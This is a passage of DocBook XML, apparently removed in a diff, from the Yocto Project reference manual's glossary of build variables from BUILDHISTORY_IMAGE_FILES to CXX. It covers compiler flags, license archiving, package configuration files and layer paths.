- the image, so that you can track the contents of each file.
- The default is to copy <filename>/etc/passwd</filename>
- and <filename>/etc/group</filename>, which allows you to
- monitor for changes in user and group entries.
- You can modify the list to include any file.
- Specifying an invalid path does not produce an error.
- Consequently, you can include files that might
- not always be present.
- </para>
-
- <para>
- By default, the <filename>buildhistory</filename> class
- provides paths to the following files:
- <literallayout class='monospaced'>
- BUILDHISTORY_IMAGE_FILES ?= "/etc/passwd /etc/group"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILDHISTORY_PUSH_REPO'><glossterm>BUILDHISTORY_PUSH_REPO</glossterm>
- <info>
- BUILDHISTORY_PUSH_REPO[doc] = "When inheriting the buildhistory class, this variable optionally specifies a remote repository to which build history pushes Git changes."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When inheriting the
- <link linkend='ref-classes-buildhistory'><filename>buildhistory</filename></link>
- class, this variable optionally specifies a remote
- repository to which build history pushes Git changes.
- In order for <filename>BUILDHISTORY_PUSH_REPO</filename>
- to work,
- <link linkend='var-BUILDHISTORY_COMMIT'><filename>BUILDHISTORY_COMMIT</filename></link>
- must be set to "1".
- </para>
-
- <para>
- The repository should correspond to a remote
- address that specifies a repository as understood by
- Git, or alternatively to a remote name that you have
- set up manually using <filename>git remote</filename>
- within the local repository.
- </para>
-
- <para>
- By default, the <filename>buildhistory</filename> class
- sets the variable as follows:
- <literallayout class='monospaced'>
- BUILDHISTORY_PUSH_REPO ?= ""
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILDSDK_CFLAGS'><glossterm>BUILDSDK_CFLAGS</glossterm>
- <info>
- BUILDSDK_CFLAGS[doc] = "Specifies the flags to pass to the C compiler when building for the SDK."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the flags to pass to the C compiler when building
- for the SDK.
- When building in the <filename>nativesdk-</filename>
- context,
- <link linkend='var-CFLAGS'><filename>CFLAGS</filename></link>
- is set to the value of this variable by default.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILDSDK_CPPFLAGS'><glossterm>BUILDSDK_CPPFLAGS</glossterm>
- <info>
- BUILDSDK_CPPFLAGS[doc] = "Specifies the flags to pass to the C pre-processor (i.e. to both the C and the C++ compilers) when building for the SDK."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the flags to pass to the C pre-processor
- (i.e. to both the C and the C++ compilers) when building
- for the SDK.
- When building in the <filename>nativesdk-</filename>
- context,
- <link linkend='var-CPPFLAGS'><filename>CPPFLAGS</filename></link>
- is set to the value of this variable by default.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILDSDK_CXXFLAGS'><glossterm>BUILDSDK_CXXFLAGS</glossterm>
- <info>
- BUILDSDK_CXXFLAGS[doc] = "Specifies the flags to pass to the C++ compiler when building for the SDK."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the flags to pass to the C++ compiler when
- building for the SDK.
- When building in the <filename>nativesdk-</filename>
- context,
- <link linkend='var-CXXFLAGS'><filename>CXXFLAGS</filename></link>
- is set to the value of this variable by default.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILDSDK_LDFLAGS'><glossterm>BUILDSDK_LDFLAGS</glossterm>
- <info>
- BUILDSDK_LDFLAGS[doc] = "Specifies the flags to pass to the linker when building for the SDK."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the flags to pass to the linker when building
- for the SDK.
- When building in the <filename>nativesdk-</filename>
- context,
- <link linkend='var-LDFLAGS'><filename>LDFLAGS</filename></link>
- is set to the value of this variable by default.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILDSTATS_BASE'><glossterm>BUILDSTATS_BASE</glossterm>
- <info>
- BUILDSTATS_BASE[doc] = "Points to the location of the directory that holds build statistics when you use and enable the buildstats class."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Points to the location of the directory that holds build
- statistics when you use and enable the
- <link linkend='ref-classes-buildstats'><filename>buildstats</filename></link>
- class.
- The <filename>BUILDSTATS_BASE</filename> directory defaults
- to
- <filename>${</filename><link linkend='var-TMPDIR'><filename>TMPDIR</filename></link><filename>}/buildstats/</filename>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUSYBOX_SPLIT_SUID'><glossterm>BUSYBOX_SPLIT_SUID</glossterm>
- <info>
- BUSYBOX_SPLIT_SUID[doc] = "For the BusyBox recipe, specifies whether to split the output executable file into two parts: one for features that require setuid root, and one for the remaining features."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- For the BusyBox recipe, specifies whether to split the
- output executable file into two parts: one for features
- that require <filename>setuid root</filename>, and one for
- the remaining features (i.e. those that do not require
- <filename>setuid root</filename>).
- </para>
-
- <para>
- The <filename>BUSYBOX_SPLIT_SUID</filename> variable
- defaults to "1", which results in splitting the output
- executable file.
- Set the variable to "0" to get a single output executable
- file.
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
- <glossdiv id='var-glossary-c'><title>C</title>
-
- <glossentry id='var-CACHE'><glossterm>CACHE</glossterm>
- <info>
- CACHE[doc] = "The directory BitBake uses to store a cache of the metadata."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the directory BitBake uses to store a cache
- of the
- <link linkend='metadata'>Metadata</link>
- so it does not need to be parsed every time BitBake is
- started.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-CC'><glossterm>CC</glossterm>
- <info>
- CC[doc] = "Minimum command and arguments to run the C compiler."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The minimal command and arguments used to run the C
- compiler.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-CFLAGS'><glossterm>CFLAGS</glossterm>
- <info>
- CFLAGS[doc] = "Flags passed to the C compiler for the target system. This variable evaluates to the same as TARGET_CFLAGS."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the flags to pass to the C compiler.
- This variable is exported to an environment
- variable and thus made visible to the software being
- built during the compilation step.
- </para>
-
- <para>
- Default initialization for <filename>CFLAGS</filename>
- varies depending on what is being built:
- <itemizedlist>
- <listitem><para>
- <link linkend='var-TARGET_CFLAGS'><filename>TARGET_CFLAGS</filename></link>
- when building for the target
- </para></listitem>
- <listitem><para>
- <link linkend='var-BUILD_CFLAGS'><filename>BUILD_CFLAGS</filename></link>
- when building for the build host (i.e.
- <filename>-native</filename>)
- </para></listitem>
- <listitem><para>
- <link linkend='var-BUILDSDK_CFLAGS'><filename>BUILDSDK_CFLAGS</filename></link>
- when building for an SDK (i.e.
- <filename>nativesdk-</filename>)
- </para></listitem>
- </itemizedlist>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-CLASSOVERRIDE'><glossterm>CLASSOVERRIDE</glossterm>
- <info>
- CLASSOVERRIDE[doc] = "An internal variable specifying the special class override that should currently apply (e.g. "class-target", "class-native", and so forth)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- An internal variable specifying the special class override
- that should currently apply (e.g. "class-target",
- "class-native", and so forth).
- The classes that use this variable (e.g.
- <link linkend='ref-classes-native'><filename>native</filename></link>,
- <link linkend='ref-classes-nativesdk'><filename>nativesdk</filename></link>,
- and so forth) set the variable to appropriate values.
- <note>
- <filename>CLASSOVERRIDE</filename> gets its default
- "class-target" value from the
- <filename>bitbake.conf</filename> file.
- </note>
- </para>
-
- <para>
- As an example, the following override allows you to install
- extra files, but only when building for the target:
- <literallayout class='monospaced'>
- do_install_append_class-target() {
- install my-extra-file ${D}${sysconfdir}
- }
- </literallayout>
- Here is an example where <filename>FOO</filename>
- is set to "native" when building for the build host, and
- to "other" when not building for the build host:
- <literallayout class='monospaced'>
- FOO_class-native = "native"
- FOO = "other"
- </literallayout>
- The underlying mechanism behind
- <filename>CLASSOVERRIDE</filename> is simply that it is
- included in the default value of
- <link linkend='var-OVERRIDES'><filename>OVERRIDES</filename></link>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-CLEANBROKEN'><glossterm>CLEANBROKEN</glossterm>
- <info>
- CLEANBROKEN[doc] = "Prevents the build system from running 'make clean' during the do_configure task."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- If set to "1" within a recipe,
- <filename>CLEANBROKEN</filename> specifies that
- the <filename>make clean</filename> command does
- not work for the software being built.
- Consequently, the OpenEmbedded build system will not try
- to run <filename>make clean</filename> during the
- <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>
- task, which is the default behavior.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-COMBINED_FEATURES'><glossterm>COMBINED_FEATURES</glossterm>
- <info>
- COMBINED_FEATURES[doc] = "A set of features common between MACHINE_FEATURES and DISTRO_FEATURES."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Provides a list of hardware features that are enabled in
- both
- <link linkend='var-MACHINE_FEATURES'><filename>MACHINE_FEATURES</filename></link>
- and
- <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>.
- This select list of features contains features that make
- sense to be controlled both at the machine and distribution
- configuration level.
- For example, the "bluetooth" feature requires hardware
- support but should also be optional at the distribution
- level, in case the hardware supports Bluetooth but you
- do not ever intend to use it.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-COMMON_LICENSE_DIR'><glossterm>COMMON_LICENSE_DIR</glossterm>
- <info>
- COMMON_LICENSE_DIR[doc] = "Points to meta/files/common-licenses in the Source Directory, which is where generic license files reside."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Points to <filename>meta/files/common-licenses</filename>
- in the
- <link linkend='source-directory'>Source Directory</link>,
- which is where generic license files reside.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-COMPATIBLE_HOST'><glossterm>COMPATIBLE_HOST</glossterm>
- <info>
- COMPATIBLE_HOST[doc] = "A regular expression that resolves to one or more hosts (when the recipe is native) or one or more targets (when the recipe is non-native) with which a recipe is compatible."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A regular expression that resolves to one or more hosts
- (when the recipe is native) or one or more targets (when
- the recipe is non-native) with which a recipe is compatible.
- The regular expression is matched against
- <link linkend="var-HOST_SYS"><filename>HOST_SYS</filename></link>.
- You can use the variable to stop recipes from being built
- for classes of systems with which the recipes are not
- compatible.
- Stopping these builds is particularly useful with kernels.
- The variable also helps to increase parsing speed
- since the build system skips parsing recipes not
- compatible with the current system.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-COMPATIBLE_MACHINE'><glossterm>COMPATIBLE_MACHINE</glossterm>
- <info>
- COMPATIBLE_MACHINE[doc] = "A regular expression that resolves to one or more target machines with which a recipe is compatible."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A regular expression that resolves to one or more
- target machines with which a recipe is compatible.
- The regular expression is matched against
- <link linkend="var-MACHINEOVERRIDES"><filename>MACHINEOVERRIDES</filename></link>.
- You can use the variable to stop recipes from being built
- for machines with which the recipes are not compatible.
- Stopping these builds is particularly useful with kernels.
- The variable also helps to increase parsing speed
- since the build system skips parsing recipes not
- compatible with the current machine.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-COMPLEMENTARY_GLOB'><glossterm>COMPLEMENTARY_GLOB</glossterm>
- <info>
- COMPLEMENTARY_GLOB[doc] = "Defines wildcards to match when installing a list of complementary packages for all the packages installed in an image."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Defines wildcards to match when installing a list of
- complementary packages for all the packages explicitly
- (or implicitly) installed in an image.
- <note>
- The <filename>COMPLEMENTARY_GLOB</filename> variable
- uses Unix filename pattern matching
- (<ulink url='https://docs.python.org/2/library/fnmatch.html#module-fnmatch'><filename>fnmatch</filename></ulink>),
- which is similar to the Unix style pathname pattern
- expansion
- (<ulink url='https://docs.python.org/2/library/glob.html'><filename>glob</filename></ulink>).
- </note>
- The resulting list of complementary packages is associated
- with an item that can be added to
- <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>.
- An example usage of this is the "dev-pkgs" item that when
- added to <filename>IMAGE_FEATURES</filename> will
- install -dev packages (containing headers and other
- development files) for every package in the image.
- </para>
-
- <para>
- To add a new feature item pointing to a wildcard, use a
- variable flag to specify the feature item name and
- use the value to specify the wildcard.
- Here is an example:
- <literallayout class='monospaced'>
- COMPLEMENTARY_GLOB[dev-pkgs] = '*-dev'
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-COMPONENTS_DIR'><glossterm>COMPONENTS_DIR</glossterm>
- <info>
- COMPONENTS_DIR[doc] = "Stores sysroot components for each recipe."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Stores sysroot components for each recipe.
- The OpenEmbedded build system uses
- <filename>COMPONENTS_DIR</filename> when constructing
- recipe-specific sysroots for other recipes.
- </para>
-
- <para>
- The default is
- "<filename>${</filename><link linkend='var-STAGING_DIR'><filename>STAGING_DIR</filename></link><filename>}-components</filename>."
- (i.e. "<filename>${</filename><link linkend='var-TMPDIR'><filename>TMPDIR</filename></link><filename>}/sysroots-components</filename>").
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-CONF_VERSION'><glossterm>CONF_VERSION</glossterm>
- <info>
- CONF_VERSION[doc] = "Tracks the version of local.conf. Increased each time build/conf/ changes incompatibly."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Tracks the version of the local configuration file
- (i.e. <filename>local.conf</filename>).
- The value for <filename>CONF_VERSION</filename>
- increments each time <filename>build/conf/</filename>
- compatibility changes.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-CONFFILES'><glossterm>CONFFILES</glossterm>
- <info>
- CONFFILES[doc] = "Identifies editable or configurable files that are part of a package."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Identifies editable or configurable files that are part of a package.
- If the Package Management System (PMS) is being used to update
- packages on the target system, it is possible that
- configuration files you have changed after the original installation
- and that you now want to remain unchanged are overwritten.
- In other words, editable files might exist in the package that you do not
- want reset as part of the package update process.
- You can use the <filename>CONFFILES</filename> variable to list the files in the
- package that you wish to prevent the PMS from overwriting during this update process.
- </para>
-
- <para>
- To use the <filename>CONFFILES</filename> variable, provide a package name
- override that identifies the resulting package.
- Then, provide a space-separated list of files.
- Here is an example:
- <literallayout class='monospaced'>
- CONFFILES_${PN} += "${sysconfdir}/file1 \
- ${sysconfdir}/file2 ${sysconfdir}/file3"
- </literallayout>
- </para>
-
- <para>
- A relationship exists between the <filename>CONFFILES</filename> and
- <filename><link linkend='var-FILES'>FILES</link></filename> variables.
- The files listed within <filename>CONFFILES</filename> must be a subset of
- the files listed within <filename>FILES</filename>.
- Because the configuration files you provide with <filename>CONFFILES</filename>
- are simply being identified so that the PMS will not overwrite them,
- it makes sense that
- the files must already be included as part of the package through the
- <filename>FILES</filename> variable.
- </para>
-
- <note>
- When specifying paths as part of the <filename>CONFFILES</filename> variable,
- it is good practice to use appropriate path variables.
- For example, <filename>${sysconfdir}</filename> rather than
- <filename>/etc</filename> or <filename>${bindir}</filename> rather
- than <filename>/usr/bin</filename>.
- You can find a list of these variables at the top of the
- <filename>meta/conf/bitbake.conf</filename> file in the
- <link linkend='source-directory'>Source Directory</link>.
- </note>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-CONFIG_INITRAMFS_SOURCE'><glossterm>CONFIG_INITRAMFS_SOURCE</glossterm>
- <info>
- CONFIG_INITRAMFS_SOURCE[doc] = "Identifies the initial RAM filesystem (initramfs) source files. The OpenEmbedded build system receives and uses this kernel Kconfig variable as an environment variable."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Identifies the initial RAM filesystem (initramfs) source
- files.
- The OpenEmbedded build system receives and uses
- this kernel Kconfig variable as an environment variable.
- By default, the variable is set to null ("").
- </para>
-
- <para>
- The <filename>CONFIG_INITRAMFS_SOURCE</filename> can be
- either a single cpio archive with a
- <filename>.cpio</filename> suffix or a
- space-separated list of directories and files for building
- the initramfs image.
- A cpio archive should contain a filesystem archive
- to be used as an initramfs image.
- Directories should contain a filesystem layout to be
- included in the initramfs image.
- Files should contain entries according to the format
- described by the
- <filename>usr/gen_init_cpio</filename> program in the
- kernel tree.
- </para>
-
- <para>
- If you specify multiple directories and files, the
- initramfs image will be the aggregate of all of them.
- </para>
-
- <para>
- For information on creating an initramfs, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#building-an-initramfs-image'>Building an Initial RAM Filesystem (initramfs) Image</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-CONFIG_SITE'><glossterm>CONFIG_SITE</glossterm>
- <info>
- CONFIG_SITE[doc] = "A list of files that contains autoconf test results relevant to the current build. This variable is used by the Autotools utilities when running configure."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of files that contains <filename>autoconf</filename> test results relevant
- to the current build.
- This variable is used by the Autotools utilities when running
- <filename>configure</filename>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-CONFIGURE_FLAGS'><glossterm>CONFIGURE_FLAGS</glossterm>
- <info>
- CONFIGURE_FLAGS[doc] = "The minimal arguments for GNU configure."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The minimal arguments for GNU configure.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-CONFLICT_DISTRO_FEATURES'><glossterm>CONFLICT_DISTRO_FEATURES</glossterm>
- <info>
- CONFLICT_DISTRO_FEATURES[doc] = "When a recipe inherits the distro_features_check class, this variable identifies distribution features that would be in conflict should the recipe be built."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When inheriting the
- <link linkend='ref-classes-distro_features_check'><filename>distro_features_check</filename></link>
- class, this
- variable identifies distribution features that would
- be in conflict should the recipe
- be built.
- In other words, if the
- <filename>CONFLICT_DISTRO_FEATURES</filename> variable
- lists a feature that also appears in
- <filename>DISTRO_FEATURES</filename> within the
- current configuration, an error occurs and the
- build stops.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-COPYLEFT_LICENSE_EXCLUDE'><glossterm>COPYLEFT_LICENSE_EXCLUDE</glossterm>
- <info>
- COPYLEFT_LICENSE_EXCLUDE[doc] = "Licenses to exclude in the source archived by the archiver class."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A space-separated list of licenses to exclude from the
- source archived by the
- <link linkend='ref-classes-archiver'><filename>archiver</filename></link>
- class.
- In other words, if a license in a recipe's
- <link linkend='var-LICENSE'><filename>LICENSE</filename></link>
- value is in the value of
- <filename>COPYLEFT_LICENSE_EXCLUDE</filename>, then its
- source is not archived by the class.
- <note>
- The <filename>COPYLEFT_LICENSE_EXCLUDE</filename>
- variable takes precedence over the
- <link linkend='var-COPYLEFT_LICENSE_INCLUDE'><filename>COPYLEFT_LICENSE_INCLUDE</filename></link>
- variable.
- </note>
- The default value, which is "CLOSED Proprietary", for
- <filename>COPYLEFT_LICENSE_EXCLUDE</filename> is set
- by the
- <link linkend='ref-classes-copyleft_filter'><filename>copyleft_filter</filename></link>
- class, which is inherited by the
- <filename>archiver</filename> class.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-COPYLEFT_LICENSE_INCLUDE'><glossterm>COPYLEFT_LICENSE_INCLUDE</glossterm>
- <info>
- COPYLEFT_LICENSE_INCLUDE[doc] = "Licenses to include in the source archived by the archiver class."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A space-separated list of licenses to include in the
- source archived by the
- <link linkend='ref-classes-archiver'><filename>archiver</filename></link>
- class.
- In other words, if a license in a recipe's
- <link linkend='var-LICENSE'><filename>LICENSE</filename></link>
- value is in the value of
- <filename>COPYLEFT_LICENSE_INCLUDE</filename>, then its
- source is archived by the class.
- </para>
-
- <para>
- The default value is set by the
- <link linkend='ref-classes-copyleft_filter'><filename>copyleft_filter</filename></link>
- class, which is inherited by the
- <filename>archiver</filename> class.
- The default value includes "GPL*", "LGPL*", and "AGPL*".
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-COPYLEFT_PN_EXCLUDE'><glossterm>COPYLEFT_PN_EXCLUDE</glossterm>
- <info>
- COPYLEFT_PN_EXCLUDE[doc] = "Recipes to exclude in the source archived by the archiver class."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of recipes to exclude in the source archived
- by the
- <link linkend='ref-classes-archiver'><filename>archiver</filename></link>
- class.
- The <filename>COPYLEFT_PN_EXCLUDE</filename> variable
- overrides the license inclusion and exclusion caused
- through the
- <link linkend='var-COPYLEFT_LICENSE_INCLUDE'><filename>COPYLEFT_LICENSE_INCLUDE</filename></link>
- and
- <link linkend='var-COPYLEFT_LICENSE_EXCLUDE'><filename>COPYLEFT_LICENSE_EXCLUDE</filename></link>
- variables, respectively.
- </para>
-
- <para>
- The default value, which is "" indicating to not explicitly
- exclude any recipes by name, for
- <filename>COPYLEFT_PN_EXCLUDE</filename> is set
- by the
- <link linkend='ref-classes-copyleft_filter'><filename>copyleft_filter</filename></link>
- class, which is inherited by the
- <filename>archiver</filename> class.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-COPYLEFT_PN_INCLUDE'><glossterm>COPYLEFT_PN_INCLUDE</glossterm>
- <info>
- COPYLEFT_PN_INCLUDE[doc] = "Recipes to include in the source archived by the archiver class."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of recipes to include in the source archived
- by the
- <link linkend='ref-classes-archiver'><filename>archiver</filename></link>
- class.
- The <filename>COPYLEFT_PN_INCLUDE</filename> variable
- overrides the license inclusion and exclusion caused
- through the
- <link linkend='var-COPYLEFT_LICENSE_INCLUDE'><filename>COPYLEFT_LICENSE_INCLUDE</filename></link>
- and
- <link linkend='var-COPYLEFT_LICENSE_EXCLUDE'><filename>COPYLEFT_LICENSE_EXCLUDE</filename></link>
- variables, respectively.
- </para>
-
- <para>
- The default value, which is "" indicating to not explicitly
- include any recipes by name, for
- <filename>COPYLEFT_PN_INCLUDE</filename> is set
- by the
- <link linkend='ref-classes-copyleft_filter'><filename>copyleft_filter</filename></link>
- class, which is inherited by the
- <filename>archiver</filename> class.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-COPYLEFT_RECIPE_TYPES'><glossterm>COPYLEFT_RECIPE_TYPES</glossterm>
- <info>
- COPYLEFT_RECIPE_TYPES[doc] = "Recipe types to include in the source archived by the archiver class."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A space-separated list of recipe types to include
- in the source archived by the
- <link linkend='ref-classes-archiver'><filename>archiver</filename></link>
- class.
- Recipe types are <filename>target</filename>,
- <filename>native</filename>,
- <filename>nativesdk</filename>,
- <filename>cross</filename>,
- <filename>crosssdk</filename>, and
- <filename>cross-canadian</filename>.
- </para>
-
- <para>
- The default value, which is "target*", for
- <filename>COPYLEFT_RECIPE_TYPES</filename> is set
- by the
- <link linkend='ref-classes-copyleft_filter'><filename>copyleft_filter</filename></link>
- class, which is inherited by the
- <filename>archiver</filename> class.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-COPY_LIC_DIRS'><glossterm>COPY_LIC_DIRS</glossterm>
- <info>
- COPY_LIC_DIRS[doc] = "If set to "1" along with the COPY_LIC_MANIFEST variable, the OpenEmbedded build system copies into the image the license files, which are located in /usr/share/common-licenses, for each package."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- If set to "1" along with the
- <link linkend='var-COPY_LIC_MANIFEST'><filename>COPY_LIC_MANIFEST</filename></link>
- variable, the OpenEmbedded build system copies
- into the image the license files, which are located in
- <filename>/usr/share/common-licenses</filename>,
- for each package.
- The license files are placed
- in directories within the image itself during build time.
- <note>
- The <filename>COPY_LIC_DIRS</filename> does not
- offer a path for adding licenses for newly installed
- packages to an image, which might be most suitable
- for read-only filesystems that cannot be upgraded.
- See the
- <link linkend='var-LICENSE_CREATE_PACKAGE'><filename>LICENSE_CREATE_PACKAGE</filename></link>
- variable for additional information.
- You can also reference the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#providing-license-text'>Providing License Text</ulink>"
- section in the Yocto Project Development Tasks Manual
- for information on providing license text.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-COPY_LIC_MANIFEST'><glossterm>COPY_LIC_MANIFEST</glossterm>
- <info>
- COPY_LIC_MANIFEST[doc] = "If set to "1", the OpenEmbedded build system copies the license manifest for the image to /usr/share/common-licenses/license.manifest within the image itself."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- If set to "1", the OpenEmbedded build system copies
- the license manifest for the image to
- <filename>/usr/share/common-licenses/license.manifest</filename>
- within the image itself during build time.
- <note>
- The <filename>COPY_LIC_MANIFEST</filename> does not
- offer a path for adding licenses for newly installed
- packages to an image, which might be most suitable
- for read-only filesystems that cannot be upgraded.
- See the
- <link linkend='var-LICENSE_CREATE_PACKAGE'><filename>LICENSE_CREATE_PACKAGE</filename></link>
- variable for additional information.
- You can also reference the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#providing-license-text'>Providing License Text</ulink>"
- section in the Yocto Project Development Tasks Manual
- for information on providing license text.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-CORE_IMAGE_EXTRA_INSTALL'><glossterm>CORE_IMAGE_EXTRA_INSTALL</glossterm>
- <info>
- CORE_IMAGE_EXTRA_INSTALL[doc] = "Specifies the list of packages to be added to the image. You should only set this variable in the conf/local.conf file in the Build Directory."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the list of packages to be added to the image.
- You should only set this variable in the
- <filename>local.conf</filename> configuration file found
- in the
- <link linkend='build-directory'>Build Directory</link>.
- </para>
-
- <para>
- This variable replaces <filename>POKY_EXTRA_INSTALL</filename>, which is no longer supported.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-COREBASE'><glossterm>COREBASE</glossterm>
- <info>
- COREBASE[doc] = "Specifies the parent directory of the OpenEmbedded-Core Metadata layer (i.e. meta)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the parent directory of the OpenEmbedded-Core
- Metadata layer (i.e. <filename>meta</filename>).
- </para>
-
- <para>
- It is an important distinction that
- <filename>COREBASE</filename> points to the parent of this
- layer and not the layer itself.
- Consider an example where you have cloned the Poky Git
- repository and retained the <filename>poky</filename>
- name for your local copy of the repository.
- In this case, <filename>COREBASE</filename> points to
- the <filename>poky</filename> folder because it is the
- parent directory of the <filename>poky/meta</filename>
- layer.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-COREBASE_FILES'><glossterm>COREBASE_FILES</glossterm>
- <info>
- COREBASE_FILES[doc] = "Lists files from the COREBASE directory that should be copied other than the layers listed in the bblayers.conf file."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Lists files from the
- <link linkend='var-COREBASE'><filename>COREBASE</filename></link>
- directory that should be copied other than the layers
- listed in the <filename>bblayers.conf</filename> file.
- The <filename>COREBASE_FILES</filename> variable exists
- for the purpose of copying metadata from the
- OpenEmbedded build system into the extensible
- SDK.
- </para>
-
- <para>
- Explicitly listing files in <filename>COREBASE</filename>
- is needed because it typically contains build
- directories and other files that should not normally
- be copied into the extensible SDK.
- Consequently, the value of
- <filename>COREBASE_FILES</filename> is used in order to
- only copy the files that are actually needed.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-CPP'><glossterm>CPP</glossterm>
- <info>
- CPP[doc] = "Minimum command and arguments to run the C preprocessor."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The minimal command and arguments used to run the C
- preprocessor.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-CPPFLAGS'><glossterm>CPPFLAGS</glossterm>
- <info>
- CPPFLAGS[doc] = "Specifies the flags to pass to the C pre-processor (i.e. to both the C and the C++ compilers)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the flags to pass to the C pre-processor
- (i.e. to both the C and the C++ compilers).
- This variable is exported to an environment
- variable and thus made visible to the software being
- built during the compilation step.
- </para>
-
- <para>
- Default initialization for <filename>CPPFLAGS</filename>
- varies depending on what is being built:
- <itemizedlist>
- <listitem><para>
- <link linkend='var-TARGET_CPPFLAGS'><filename>TARGET_CPPFLAGS</filename></link>
- when building for the target
- </para></listitem>
- <listitem><para>
- <link linkend='var-BUILD_CPPFLAGS'><filename>BUILD_CPPFLAGS</filename></link>
- when building for the build host (i.e.
- <filename>-native</filename>)
- </para></listitem>
- <listitem><para>
- <link linkend='var-BUILDSDK_CPPFLAGS'><filename>BUILDSDK_CPPFLAGS</filename></link>
- when building for an SDK (i.e.
- <filename>nativesdk-</filename>)
- </para></listitem>
- </itemizedlist>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-CROSS_COMPILE'><glossterm>CROSS_COMPILE</glossterm>
- <info>
- CROSS_COMPILE[doc] = "The toolchain binary prefix for the target tools."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The toolchain binary prefix for the target tools.
- The <filename>CROSS_COMPILE</filename> variable is the
- same as the
- <link linkend='var-TARGET_PREFIX'><filename>TARGET_PREFIX</filename></link>
- variable.
- <note>
- The OpenEmbedded build system sets the
- <filename>CROSS_COMPILE</filename> variable only in
- certain contexts (e.g. when building for kernel
- and kernel module recipes).
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-CVSDIR'><glossterm>CVSDIR</glossterm>
- <info>
- CVSDIR[doc] = "The directory where cvs checkouts will be stored in."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The directory in which files checked out under the
- CVS system are stored.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-CXX'><glossterm>CXX</glossterm>
- <info>
- CXX[doc] = "Minimum command and arguments to run the C++ compiler."
- </info>
- <glossdef>
- <para role="glossdeffirst">
